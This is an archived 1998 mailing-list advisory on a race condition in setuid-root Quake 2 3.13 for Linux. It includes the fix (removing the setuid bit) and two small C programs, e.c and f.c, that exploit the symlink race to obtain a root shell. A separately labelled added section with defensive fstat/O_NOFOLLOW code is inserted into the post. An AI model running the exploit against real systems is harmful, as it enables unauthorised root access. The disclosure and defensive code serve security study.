Quake 2 Linux 3.13 - ref_root.so still works

From: kevingeoat_private
Date: Wed Feb 25 1998 - 05:49:10 PST


    Vulnerable:
    Everyone who followed the installation instructions and made Quake2 setuid
    root.
    
    Solution:
    chmod u-s quake2.
    
    Exploit:
    In version 3.13, Quake2 tries to protect itself by checking the permissions
    of a library before loading it.  This just introduces a race condition.
    
    Simply find a file that is owned by root and has 0700
    permissions, call ref_root.so ref_root.real.so, run e.c (./e
    /usr/games/quake2/ref_soft.so &, for example)
    in background, and then run f.c.  You'll have a root shell after a few
    minutes.
    
    e.c:
    #include <unistd.h>

    /* Flip the ref_root.so symlink back and forth between the file named
       on the command line and the renamed real library, as described above. */
    int main(int argc, char **argv) {
        if (argc < 2)
            return 1;
        while (1) {
            unlink("ref_root.so");
            symlink(argv[1], "ref_root.so");
            unlink("ref_root.so");
            symlink("ref_root.real.so", "ref_root.so");
        }
    }

    f.c:
    #include <stdlib.h>

    /* Repeatedly start quake2 with the "root" video driver so that it keeps
       loading ref_root.so while the symlink above is being flipped. */
    int main(void) {
        while (1) {
            system("/usr/games/quake/quake2 +set vid_ref root");
        }
    }
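The race the post relies on exists because the permission check is done on a path and the load is done on the same path a moment later. The following added example (not from the post or from Quake 2) shows the defender's alternative: open first, check the inode actually held with fstat, and refuse symlinks outright; the function names and the /tmp demo files are constructed for illustration. The post's own solution, removing the setuid bit, remains the real fix; this only shows how such a check must be done if a privileged program insists on loading libraries from a writable location.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical replacement for a stat()-then-dlopen() check. Open the path
 * without following a final symlink, then verify the inode actually held:
 * a regular file, owned by `owner`, not writable by group or others.
 * Returns the descriptor (load it via /proc/self/fd/N) or -1. */
int open_checked_library(const char *path, uid_t owner) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demonstration: a plain file owned by the caller passes; a
 * symlink pointing at that same file is refused (open fails with ELOOP),
 * so a swapped symlink never reaches the loader.
 * Returns 0 when both behave as expected, -1 otherwise. */
int demo(void) {
    char dir[] = "/tmp/libcheck.XXXXXX", real[64], link[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(real, sizeof real, "%s/ref_real.so", dir);
    snprintf(link, sizeof link, "%s/ref_link.so", dir);
    int f = open(real, O_WRONLY | O_CREAT | O_EXCL, 0700);
    if (f < 0 || close(f) != 0 || symlink(real, link) != 0) return -1;
    int fd_real = open_checked_library(real, getuid());
    int fd_link = open_checked_library(link, getuid());
    int rc = (fd_real >= 0 && fd_link == -1) ? 0 : -1;
    if (fd_real >= 0) close(fd_real);
    unlink(link); unlink(real); rmdir(dir);
    return rc;
}

int main(void) {
    int rc = demo();
    printf("fd-based check behaved as expected: %s\n", rc == 0 ? "yes" : "no");
    return rc == 0 ? 0 : 1;
}
```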
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:43:15 PDT